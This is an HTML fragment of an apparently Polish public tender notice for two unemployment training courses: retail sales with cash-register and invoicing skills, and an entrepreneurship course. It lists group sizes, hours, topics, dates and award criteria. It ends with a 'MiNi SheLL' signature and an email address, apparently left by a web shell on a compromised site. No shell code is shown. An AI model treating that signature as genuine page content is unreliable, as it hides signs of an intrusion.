<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Celem szkolenia jest uzyskanie przez uczestników praktycznych umiejętności z zakresu sprzedaży, obsługi kasy fiskalnej z fakturowaniem komputerowym oraz przestrzeganiem zasad higieny w procesie produkcji żywności i w obrocie żywnością.
2. Liczba osób do przeszkolenia: 7 osób (jedna grupa). Nie dopuszcza się możliwości zwiększenia grupy szkoleniowej przez wykonawcę.
3. Forma organizacji szkolenia: kurs.
4. Pożądany termin rozpoczęcia i zakończenia szkolenia:  październik 2012.
5. Czas trwania kursu: maksymalnie 20 dni kalendarzowych.
6. Wymagana ilość godzin zajęć dydaktycznych - 100. Godzina zegarowa zajęć liczy 45 minut zajęć i 15 minut przerwy, przy czym długość przerw może być ustalana elastycznie. Dzień zajęć nie może kończyć się przerwą. 
7. Wymagany zakres tematyczny szkolenia:
- BHP w handlu, organizacja pracy w placówce handlowej - 8 godz.
- zasady higieny w procesie produkcji żywności i w obrocie żywnością  - 8 godz.
- profesjonalna obsługa klienta - 8 godz.
- realizacja płatności gotówkowych i bezgotówkowych - 8 godz.,
- obsługa komputera - 20 godz.
- oObsługa kas fiskalnych i urządzeń współpracujących, terminale kart płatniczych - 24 godz. 
- fakturowanie komputerowe - obsługa programu informatycznego - 24 godz.,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie Wykonawcy - 30</li>
<li>3. Posiadanie certyfikatów jakości usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ABC przedsiębiorczości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Celem szkolenia jest wyposażenie skierowanych osób bezrobotnych w wiedzę obejmującą prawne i ekonomiczne aspekty prowadzonej działalności gospodarczej, prawa pracy, zasady tworzenia i opracowywania biznes planu/ wniosku o przyznanie jednorazowych środków na podjęcie działalności gospodarczej oraz przygotowanie w ramach zajęć warsztatowych wstępnej wersji wniosku o przyznanie jednorazowych środków na podjęcie działalności gospodarczej opracowanego przez skierowanych uczestników projektu.
2. Liczba osób do przeszkolenia: maksymalnie 121 osób, w tym: w 2012 roku 36 osób w trzech grupach szkoleniowych, w 2013 roku 85 osób w 8-12 osobowych grupach szkoleniowych. Minimalna liczba uczestników - 115.
3. Forma organizacji szkolenia: kurs.
4. Liczba kursów (grup):  maksymalnie 15, minimalnie 11 (3 grupy w 2012 roku, od 8 do 12 grup w roku 2013)
5. Pożądany termin szkolenia: I, II i III grupa  17-21.09.2012 (3 grupy w tym samym czasie), pozostałe grupy I-V 2013 i VI-X 2013.
6 Grupy będą zgłaszane Wykonawcy z co najmniej 2-tygodniowym wyprzedzeniem.
7. Wymagana ilość godzin dydaktycznych -40 godz/os. (teoria i zajęcia warsztatowe).
8. Czas trwania szkolenia (jednej grupy): 5 dni roboczych następujących po sobie.
9. Wymagany zakres tematyczny szkolenia:
a) Dwa dni zajęć - 16 godz: 
- Działalność gospodarcza - aspekty prawne,
- Działalność gospodarcza - aspekty ekonomiczne,
- Prawo pracy,
- Zasady tworzenia i opracowywania biznesplanu/wniosku
b) Trzy dni zajęć - 24 godz:
- Zajęcia warsztatowe obejmujące opracowanie wstępnej wersji wniosku przez uczestników wg wzoru Zamawiającego (Załącznik nr 4 do umowy).
10. Wnioski uczestników wymagają zaopiniowania przez jednostkę szkolącą - trenera prowadzącego warsztaty. Wymaga się, aby opinia do wniosku była wystawiona na wzorze zawartym w formularzu wniosku (tzw. rekomendacja trenera). 
11. Zamawiający wymaga, aby wnioski wraz z opinią trenera zostały dostarczone do siedziby Zamawiającego w terminie 14 dni od daty ukończenia szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie trenerów/wykładowców - 30</li>
<li>3. Posiadanie certyfikatów jakości usług - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com